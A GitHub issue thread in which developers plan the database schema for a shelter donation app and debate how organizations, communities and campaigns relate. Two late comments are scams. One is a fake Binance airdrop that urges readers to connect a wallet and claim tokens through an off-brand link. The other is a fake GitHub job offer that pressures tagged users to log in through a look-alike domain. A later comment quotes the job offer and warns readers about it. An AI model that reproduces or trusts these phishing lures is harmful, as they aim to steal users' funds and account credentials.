### ISSUE TITLE
Schema

### ISSUE THREAD

**Issue by jeremyjs** [jjman505/afs#4]
# User

| Field | Type |
| --- | --- |
| Name | String |
| Username | String |
| Email | String |
| Password | Encrypted String |
| CommunityIds | [CommunityId] |
| CampaignIds | [CampaignId] |
| FollowedShelterIds | [ShelterId] |
| isVerified | Boolean |
# Shelter

| Field | Type |
| --- | --- |
| Name | String |
| Email | String |
| Address | Object { firstLine, secondLine, city, state, zip } |
| Location | GeoPoint |
| Phone | Number |
| Description | String |
| AdminIds | [UserId] |
| isVerified | Boolean |
# Organization

This is a school or company.

| Field | Type |
| --- | --- |
| Name | String |
| Type | String |
| Description | String |
| AdminIds | [UserId] |
| isVerified | Boolean |
# Campaign

| Field | Type |
| --- | --- |
| CommunityId | CommunityId |
| ShelterId | ShelterId |
| Description | String |
| isVerified | Boolean |
# Donation

| Field | Type |
| --- | --- |
| CampaignId | CampaignId |
| DonatorId | DonatorId |
| NeededItemId | NeededItemId |
| Amount | Number |
| isVerified | Boolean |
# NeededItem

| Field | Type |
| --- | --- |
| ShelterId | ShelterId |
| Title | String |
| Description | String |
| Amount | Number |
# Announcement

Announcements could be from Shelters, Communities, or Campaigns.

| Field | Type |
| --- | --- |
| EntityId | ObjectId |
| AnnouncerId | UserId |
| Title | String |
| Message | String |
# Comment

| Field | Type |
| --- | --- |
| AnnouncementId | AnnouncementId |
| CommenterId | UserId |
| Message | String |

**Comment by jaesulli95** [comment]
Are communities the same thing as Organizations?

**Comment by jeremyjs** [comment]
@jaesulli95 Yes. I thought that a company or school or local community group should all be the same in the database and decided to call them Communities. Do you think Organizations is a better name?

**Comment by jaesulli95** [comment]
Yeah, i do i was just slightly confused at the naming, my bad

**Comment by jeremyjs** [comment]
@jaesulli95 I think it depends if the companies run the Campaign as a single, multi-location Organization or are supposed to split into separate Communities that are all underneath one Organization. @jstannard, can you provide some clarification?

**Comment by kjharris** [comment]
Could a company could be in more than one community?

**Comment by jeremyjs** [comment]
@kjharris That's what I'm thinking. There could be a branch office of a company that starts a Community in their local town for the local Shelter. Then another branch also starts a Community in their town. Then they would both belong to the same Organization.

**Comment by kjharris** [comment]
Maybe each campaign should be run in a single organization (maybe a better
name would be territory or region). That way companies can operate in one
or many location and you can still sort companies based on where they
operate. A company could still have a base of operations or whatever in the
company entity.

**Comment by jaesulli95** [comment]
We will figure it out, im doing the basic database with Parse, at the moment. Im working on data validation on the registration page. We will need to change the front end to angular, but for the most part the back end of registration on a fresh start will be done. Conlin's not on so it looks like ill be googling a good amount.

Also @jstannard probably doesn't look at email, at night time. We are night owls, lol

**Comment by jstannard** [comment]
Good one guys, I check my email at night. I'm working really late tonight.

I think of companies not being a part of communities but separate groups
when signing up. For example there would be company drives internally
within Accenture. We are planning on partnering with them in 6 cities but
they would not necessarily be associated with a community drive because
they don't have time to set up that type of campaign but they would have to
link their drive to a community shelter.

Does that make sense? Also if I replied to this email chain does everyone
get it???

**Comment by jeremyjs** [comment]
@jstannard Yes, all the messages show up on Github. As far as I know, anyone in the convo will also get an email. Sounds like we don't need to have sub-organizations like I thought, so that's simpler. I'll modify the schema accordingly.

The way I imagine it working is you have an Organization, like a school or company, and they can partner with a Shelter to do a drive. You could have one Campaign for each Organization-Shelter pairing, or you could create a Campaign that two or more Organizations "compete" at.

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by mohit-deepgrid** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
adamazad, @xiaoxiaocainiao, @AdvaithD, @bigsml, @Neville-Loh, @indianboybr, @cjie888, @tuanggolt, @dectf, @chrisyy2003, @pluriholonomic, @fowardelcac, @k0rean-rand0m, @RoCry, @padoriku, @elmayana00, @sturmenta, @atuans, @t-hiroyoshi, @stleon

**Comment by Neville-Loh** [comment]
> Hello,
> 
> We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!
> 
> As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:
> 
> * Health insurance coverage
> * Retirement savings plan
> * Flexible work schedule
> * Generous vacation and paid time off
> * Professional development opportunities
> 
> To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.
> 
> Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.
> 
> **Important:** You have 24 hours to complete the application process.
> 
> If you have any questions or need further information, please don't hesitate to contact us.
> 
> Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.
> 
> Best regards, GitHub Recruitment Team adamazad, @xiaoxiaocainiao, @AdvaithD, @bigsml, @Neville-Loh, @indianboybr, @cjie888, @tuanggolt, @dectf, @chrisyy2003, @pluriholonomic, @fowardelcac, @k0rean-rand0m, @RoCry, @padoriku, @elmayana00, @sturmenta, @atuans, @t-hiroyoshi, @stleon

**Please beware of scams**. Do not authorise unknown entity to your personal Github account. Github will **NOT** recruit talent using comment.

https://medium.com/@habib0x00/protecting-web3-developers-beware-of-scammers-lurking-in-github-comments-897a21b75fee

Sorry to hijack your thread @jeremyjs

**The original author deleted their comment, and they have been reported to the GitHub.**
